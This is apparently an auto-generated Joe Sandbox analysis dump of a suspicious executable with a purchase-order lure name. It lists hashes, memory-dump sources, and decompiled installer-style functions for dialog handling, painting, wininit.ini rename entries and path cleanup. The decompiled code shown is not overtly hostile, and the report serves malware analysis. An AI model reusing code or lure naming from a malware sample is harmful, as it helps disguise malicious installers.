                                                                      • Instruction ID: 76f77959086980b962aa09134d80ccaf3ff9503ff11d5cbb9d27109f494c381d
                                                                      • Opcode Fuzzy Hash: 2db03c5b45aca184203cada8b28729d48063b167f2ff1f5e2acf2ede9ede1086
                                                                      • Instruction Fuzzy Hash: 8351E3751443459FEB6A8E35CD863D63BB3EF67340F86406ACC46CB228D3358986CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a1dc5694fac1e9b6c7c7f05046dbb1a063989843849896a99c6e75fac9606ae0
                                                                      • Instruction ID: 45280d013f38c0214cf7d43387cd34ac7d630b085dea555e2e8791704eb4e979
                                                                      • Opcode Fuzzy Hash: a1dc5694fac1e9b6c7c7f05046dbb1a063989843849896a99c6e75fac9606ae0
                                                                      • Instruction Fuzzy Hash: EC51AC72F00741CFEB248DB8CAD87CB33665F96380F4A026A9E415B3A2E7319985C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 380199ca922a7a396182ae0a8fdc7d7bc4df8193e28fb3ee06c4f3aa4c47ba77
                                                                      • Instruction ID: 2998711d0dc440dad8f2c4fef946860054647d667b97d3424c75dea054e4a419
                                                                      • Opcode Fuzzy Hash: 380199ca922a7a396182ae0a8fdc7d7bc4df8193e28fb3ee06c4f3aa4c47ba77
                                                                      • Instruction Fuzzy Hash: 94412470A047498FEB34AF7A89E47DF33A6AF59750F81413DDC899B244D7309A418A52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 20c268509eef776ff6fc56b639409b3889fb04c67f42480b161b4a2755081016
                                                                      • Instruction ID: 5efd5d395cc4ca98f441fbdb2c8b33f80790af382a5c71d5ac4370c2c5084fd6
                                                                      • Opcode Fuzzy Hash: 20c268509eef776ff6fc56b639409b3889fb04c67f42480b161b4a2755081016
                                                                      • Instruction Fuzzy Hash: F9B09230711A40CFEF49CE0EC290F40B3A1BB48B40F418498A5058BB21C229E800CA00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E004044E2(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                      				intOrPtr _v8;
                                                                      				int _v12;
                                                                      				void* _v16;
                                                                      				struct HWND__* _t56;
                                                                      				signed int _t75;
                                                                      				signed short* _t76;
                                                                      				signed short* _t78;
                                                                      				long _t92;
                                                                      				int _t103;
                                                                      				signed int _t110;
                                                                      				intOrPtr _t113;
                                                                      				WCHAR* _t114;
                                                                      				signed int* _t116;
                                                                      				WCHAR* _t117;
                                                                      				struct HWND__* _t118;
                                                                      
                                                                      				if(_a8 != 0x110) {
                                                                      					if(_a8 != 0x111) {
                                                                      						L13:
                                                                      						if(_a8 != 0x4e) {
                                                                      							if(_a8 == 0x40b) {
                                                                      								 *0x4216f4 =  *0x4216f4 + 1;
                                                                      							}
                                                                      							L27:
                                                                      							_t114 = _a16;
                                                                      							L28:
                                                                      							return E004043AC(_a8, _a12, _t114);
                                                                      						}
                                                                      						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                      						_t114 = _a16;
                                                                      						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                      							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                      							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                      							_v12 = _t103;
                                                                      							_v16 = _t113;
                                                                      							_v8 = 0x4281e0;
                                                                      							if(_t103 - _t113 < 0x800) {
                                                                      								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                      								SetCursor(LoadCursorW(0, 0x7f02));
                                                                      								_push(1);
                                                                      								E00404791(_a4, _v8);
                                                                      								SetCursor(LoadCursorW(0, 0x7f00));
                                                                      								_t114 = _a16;
                                                                      							}
                                                                      						}
                                                                      						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                      							goto L28;
                                                                      						} else {
                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                      								SendMessageW( *0x42a248, 0x111, 1, 0);
                                                                      							}
                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                      								SendMessageW( *0x42a248, 0x10, 0, 0);
                                                                      							}
                                                                      							return 1;
                                                                      						}
                                                                      					}
                                                                      					if(_a12 >> 0x10 != 0 ||  *0x4216f4 != 0) {
                                                                      						goto L27;
                                                                      					} else {
                                                                      						_t116 =  *0x422700 + 0x14;
                                                                      						if(( *_t116 & 0x00000020) == 0) {
                                                                      							goto L27;
                                                                      						}
                                                                      						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                      						E00404367(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                      						E0040476D();
                                                                      						goto L13;
                                                                      					}
                                                                      				}
                                                                      				_t117 = _a16;
                                                                      				_t75 =  *(_t117 + 0x30);
                                                                      				if(_t75 < 0) {
                                                                      					_t75 =  *( *0x42921c - 4 + _t75 * 4);
                                                                      				}
                                                                      				_t76 =  *0x42a298 + _t75 * 2;
                                                                      				_t110 =  *_t76 & 0x0000ffff;
                                                                      				_a8 = _t110;
                                                                      				_t78 =  &(_t76[1]);
                                                                      				_a16 = _t78;
                                                                      				_v16 = _t78;
                                                                      				_v12 = 0;
                                                                      				_v8 = E00404493;
                                                                      				if(_t110 != 2) {
                                                                      					_v8 = E00404459;
                                                                      				}
                                                                      				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                      				_push(0x22);
                                                                      				E00404345(_a4);
                                                                      				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                      				_push(0x23);
                                                                      				E00404345(_a4);
                                                                      				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                      				E00404367( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                      				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                      				E0040437A(_t118);
                                                                      				SendMessageW(_t118, 0x45b, 1, 0);
                                                                      				_t92 =  *( *0x42a254 + 0x68);
                                                                      				if(_t92 < 0) {
                                                                      					_t92 = GetSysColor( ~_t92);
                                                                      				}
                                                                      				SendMessageW(_t118, 0x443, 0, _t92);
                                                                      				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                      				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                      				 *0x4216f4 = 0;
                                                                      				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                      				 *0x4216f4 = 0;
                                                                      				return 0;
                                                                      			}


















                                                                      0x004044f4
                                                                      0x00404621
                                                                      0x0040467e
                                                                      0x00404682
                                                                      0x0040474f
                                                                      0x00404751
                                                                      0x00404751
                                                                      0x00404757
                                                                      0x00404757
                                                                      0x0040475a
                                                                      0x00000000
                                                                      0x00404761
                                                                      0x00404690
                                                                      0x00404696
                                                                      0x004046a0
                                                                      0x004046ab
                                                                      0x004046ae
                                                                      0x004046b1
                                                                      0x004046bc
                                                                      0x004046bf
                                                                      0x004046c6
                                                                      0x004046d3
                                                                      0x004046e4
                                                                      0x004046ea
                                                                      0x004046f2
                                                                      0x00404700
                                                                      0x00404706
                                                                      0x00404706
                                                                      0x004046c6
                                                                      0x00404710
                                                                      0x00000000
                                                                      0x0040471b
                                                                      0x0040471f
                                                                      0x0040472f
                                                                      0x0040472f
                                                                      0x00404735
                                                                      0x00404741
                                                                      0x00404741
                                                                      0x00000000
                                                                      0x00404745
                                                                      0x00404710
                                                                      0x0040462c
                                                                      0x00000000
                                                                      0x0040463e
                                                                      0x00404643
                                                                      0x00404649
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404672
                                                                      0x00404674
                                                                      0x00404679
                                                                      0x00000000
                                                                      0x00404679
                                                                      0x0040462c
                                                                      0x004044fa
                                                                      0x004044fd
                                                                      0x00404502
                                                                      0x00404513
                                                                      0x00404513
                                                                      0x0040451b
                                                                      0x0040451e
                                                                      0x00404522
                                                                      0x00404525
                                                                      0x00404529
                                                                      0x0040452c
                                                                      0x0040452f
                                                                      0x00404532
                                                                      0x00404539
                                                                      0x0040453b
                                                                      0x0040453b
                                                                      0x00404545
                                                                      0x00404552
                                                                      0x0040455c
                                                                      0x00404561
                                                                      0x00404564
                                                                      0x00404569
                                                                      0x00404580
                                                                      0x00404587
                                                                      0x0040459a
                                                                      0x0040459d
                                                                      0x004045b1
                                                                      0x004045b8
                                                                      0x004045bd
                                                                      0x004045c2
                                                                      0x004045c2
                                                                      0x004045d0
                                                                      0x004045de
                                                                      0x004045f0
                                                                      0x004045f5
                                                                      0x00404605
                                                                      0x00404607
                                                                      0x00000000

                                                                      APIs
                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404580
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404594
                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045B1
                                                                      • GetSysColor.USER32(?), ref: 004045C2
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
                                                                      • lstrlenW.KERNEL32(?), ref: 004045E3
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040465E
                                                                      • SendMessageW.USER32(00000000), ref: 00404665
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404690
                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
                                                                      • SetCursor.USER32(00000000), ref: 004046E4
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
                                                                      • SetCursor.USER32(00000000), ref: 00404700
                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040472F
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                      • String ID: Call$N$YD@
                                                                      • API String ID: 3103080414-3276248472
                                                                      • Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                      • Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
                                                                      • Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                      • Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                      				struct tagLOGBRUSH _v16;
                                                                      				struct tagRECT _v32;
                                                                      				struct tagPAINTSTRUCT _v96;
                                                                      				struct HDC__* _t70;
                                                                      				struct HBRUSH__* _t87;
                                                                      				struct HFONT__* _t94;
                                                                      				long _t102;
                                                                      				signed int _t126;
                                                                      				struct HDC__* _t128;
                                                                      				intOrPtr _t130;
                                                                      
                                                                      				if(_a8 == 0xf) {
                                                                      					_t130 =  *0x42a254;
                                                                      					_t70 = BeginPaint(_a4,  &_v96);
                                                                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                      					_a8 = _t70;
                                                                      					GetClientRect(_a4,  &_v32);
                                                                      					_t126 = _v32.bottom;
                                                                      					_v32.bottom = _v32.bottom & 0x00000000;
                                                                      					while(_v32.top < _t126) {
                                                                      						_a12 = _t126 - _v32.top;
                                                                      						asm("cdq");
                                                                      						asm("cdq");
                                                                      						asm("cdq");
                                                                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                      						_t87 = CreateBrushIndirect( &_v16);
                                                                      						_v32.bottom = _v32.bottom + 4;
                                                                      						_a16 = _t87;
                                                                      						FillRect(_a8,  &_v32, _t87);
                                                                      						DeleteObject(_a16);
                                                                      						_v32.top = _v32.top + 4;
                                                                      					}
                                                                      					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                      						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                      						_a16 = _t94;
                                                                      						if(_t94 != 0) {
                                                                      							_t128 = _a8;
                                                                      							_v32.left = 0x10;
                                                                      							_v32.top = 8;
                                                                      							SetBkMode(_t128, 1);
                                                                      							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                      							_a8 = SelectObject(_t128, _a16);
                                                                      							DrawTextW(_t128, 0x429240, 0xffffffff,  &_v32, 0x820);
                                                                      							SelectObject(_t128, _a8);
                                                                      							DeleteObject(_a16);
                                                                      						}
                                                                      					}
                                                                      					EndPaint(_a4,  &_v96);
                                                                      					return 0;
                                                                      				}
                                                                      				_t102 = _a16;
                                                                      				if(_a8 == 0x46) {
                                                                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                      					 *((intOrPtr*)(_t102 + 4)) =  *0x42a248;
                                                                      				}
                                                                      				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                      			}













                                                                      0x0040100a
                                                                      0x00401039
                                                                      0x00401047
                                                                      0x0040104d
                                                                      0x00401051
                                                                      0x0040105b
                                                                      0x00401061
                                                                      0x00401064
                                                                      0x004010f3
                                                                      0x00401089
                                                                      0x0040108c
                                                                      0x004010a6
                                                                      0x004010bd
                                                                      0x004010cc
                                                                      0x004010cf
                                                                      0x004010d5
                                                                      0x004010d9
                                                                      0x004010e4
                                                                      0x004010ed
                                                                      0x004010ef
                                                                      0x004010ef
                                                                      0x00401100
                                                                      0x00401105
                                                                      0x0040110d
                                                                      0x00401110
                                                                      0x00401112
                                                                      0x00401118
                                                                      0x0040111f
                                                                      0x00401126
                                                                      0x00401130
                                                                      0x00401142
                                                                      0x00401156
                                                                      0x00401160
                                                                      0x00401165
                                                                      0x00401165
                                                                      0x00401110
                                                                      0x0040116e
                                                                      0x00000000
                                                                      0x00401178
                                                                      0x00401010
                                                                      0x00401013
                                                                      0x00401015
                                                                      0x0040101f
                                                                      0x0040101f
                                                                      0x00000000

                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                      • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                      • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                      • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405FFC(void* __ecx) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				long _t12;
                                                                      				long _t24;
                                                                      				char* _t31;
                                                                      				int _t37;
                                                                      				void* _t38;
                                                                      				intOrPtr* _t39;
                                                                      				long _t42;
                                                                      				WCHAR* _t44;
                                                                      				void* _t46;
                                                                      				void* _t48;
                                                                      				void* _t49;
                                                                      				void* _t52;
                                                                      				void* _t53;
                                                                      
                                                                      				_t38 = __ecx;
                                                                      				_t44 =  *(_t52 + 0x14);
                                                                      				 *0x426dc8 = 0x55004e;
                                                                      				 *0x426dcc = 0x4c;
                                                                      				if(_t44 == 0) {
                                                                      					L3:
                                                                      					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275c8, 0x400);
                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                      						_t37 = wsprintfA(0x4269c8, "%ls=%ls\r\n", 0x426dc8, 0x4275c8);
                                                                      						_t53 = _t52 + 0x10;
                                                                      						E004063D2(_t37, 0x400, 0x4275c8, 0x4275c8,  *((intOrPtr*)( *0x42a254 + 0x128)));
                                                                      						_t12 = E00405EA2(0x4275c8, 0xc0000000, 4);
                                                                      						_t48 = _t12;
                                                                      						 *(_t53 + 0x18) = _t48;
                                                                      						if(_t48 != 0xffffffff) {
                                                                      							_t42 = GetFileSize(_t48, 0);
                                                                      							_t6 = _t37 + 0xa; // 0xa
                                                                      							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                      							if(_t46 == 0 || E00405F25(_t48, _t46, _t42) == 0) {
                                                                      								L18:
                                                                      								return CloseHandle(_t48);
                                                                      							} else {
                                                                      								if(E00405E07(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                      									_t49 = E00405E07(_t38, _t21 + 0xa, "\n[");
                                                                      									if(_t49 == 0) {
                                                                      										_t48 =  *(_t53 + 0x18);
                                                                      										L16:
                                                                      										_t24 = _t42;
                                                                      										L17:
                                                                      										E00405E5D(_t24 + _t46, 0x4269c8, _t37);
                                                                      										SetFilePointer(_t48, 0, 0, 0);
                                                                      										E00405F54(_t48, _t46, _t42 + _t37);
                                                                      										GlobalFree(_t46);
                                                                      										goto L18;
                                                                      									}
                                                                      									_t39 = _t46 + _t42;
                                                                      									_t31 = _t39 + _t37;
                                                                      									while(_t39 > _t49) {
                                                                      										 *_t31 =  *_t39;
                                                                      										_t31 = _t31 - 1;
                                                                      										_t39 = _t39 - 1;
                                                                      									}
                                                                      									_t24 = _t49 - _t46 + 1;
                                                                      									_t48 =  *(_t53 + 0x18);
                                                                      									goto L17;
                                                                      								}
                                                                      								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                      								_t42 = _t42 + 0xa;
                                                                      								goto L16;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					CloseHandle(E00405EA2(_t44, 0, 1));
                                                                      					_t12 = GetShortPathNameW(_t44, 0x426dc8, 0x400);
                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                      						goto L3;
                                                                      					}
                                                                      				}
                                                                      				return _t12;
                                                                      			}



















                                                                      0x00405ffc
                                                                      0x00406005
                                                                      0x0040600c
                                                                      0x00406016
                                                                      0x0040602a
                                                                      0x00406052
                                                                      0x0040605d
                                                                      0x00406061
                                                                      0x00406081
                                                                      0x00406088
                                                                      0x00406092
                                                                      0x0040609f
                                                                      0x004060a4
                                                                      0x004060a9
                                                                      0x004060ad
                                                                      0x004060bc
                                                                      0x004060be
                                                                      0x004060cb
                                                                      0x004060cf
                                                                      0x0040616a
                                                                      0x00000000
                                                                      0x004060e5
                                                                      0x004060f2
                                                                      0x00406116
                                                                      0x0040611a
                                                                      0x00406139
                                                                      0x0040613d
                                                                      0x0040613d
                                                                      0x0040613f
                                                                      0x00406148
                                                                      0x00406153
                                                                      0x0040615e
                                                                      0x00406164
                                                                      0x00000000
                                                                      0x00406164
                                                                      0x0040611c
                                                                      0x0040611f
                                                                      0x0040612a
                                                                      0x00406126
                                                                      0x00406128
                                                                      0x00406129
                                                                      0x00406129
                                                                      0x00406131
                                                                      0x00406133
                                                                      0x00000000
                                                                      0x00406133
                                                                      0x004060fd
                                                                      0x00406103
                                                                      0x00000000
                                                                      0x00406103
                                                                      0x004060cf
                                                                      0x004060ad
                                                                      0x0040602c
                                                                      0x00406037
                                                                      0x00406040
                                                                      0x00406044
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406044
                                                                      0x00406175

                                                                      APIs
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406197,?,?), ref: 00406037
                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040
                                                                        • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                        • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                      • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
                                                                      • wsprintfA.USER32 ref: 0040607B
                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
                                                                      • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406164
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B
                                                                        • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\PO No. 3200005919.exe,80000000,00000003), ref: 00405EA6
                                                                        • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                      • String ID: %ls=%ls$[Rename]
                                                                      • API String ID: 2171350718-461813615
                                                                      • Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                      • Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
                                                                      • Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                      • Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E00406644(WCHAR* _a4) {
                                                                      				short _t5;
                                                                      				short _t7;
                                                                      				WCHAR* _t19;
                                                                      				WCHAR* _t20;
                                                                      				WCHAR* _t21;
                                                                      
                                                                      				_t20 = _a4;
                                                                      				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                      					_t20 =  &(_t20[4]);
                                                                      				}
                                                                      				if( *_t20 != 0 && E00405CF8(_t20) != 0) {
                                                                      					_t20 =  &(_t20[2]);
                                                                      				}
                                                                      				_t5 =  *_t20;
                                                                      				_t21 = _t20;
                                                                      				_t19 = _t20;
                                                                      				if(_t5 != 0) {
                                                                      					do {
                                                                      						if(_t5 > 0x1f &&  *((short*)(E00405CAE(L"*?|<>/\":", _t5))) == 0) {
                                                                      							E00405E5D(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                      							_t19 = CharNextW(_t19);
                                                                      						}
                                                                      						_t20 = CharNextW(_t20);
                                                                      						_t5 =  *_t20;
                                                                      					} while (_t5 != 0);
                                                                      				}
                                                                      				 *_t19 =  *_t19 & 0x00000000;
                                                                      				while(1) {
                                                                      					_push(_t19);
                                                                      					_push(_t21);
                                                                      					_t19 = CharPrevW();
                                                                      					_t7 =  *_t19;
                                                                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                      						break;
                                                                      					}
                                                                      					 *_t19 =  *_t19 & 0x00000000;
                                                                      					if(_t21 < _t19) {
                                                                      						continue;
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				return _t7;
                                                                      			}








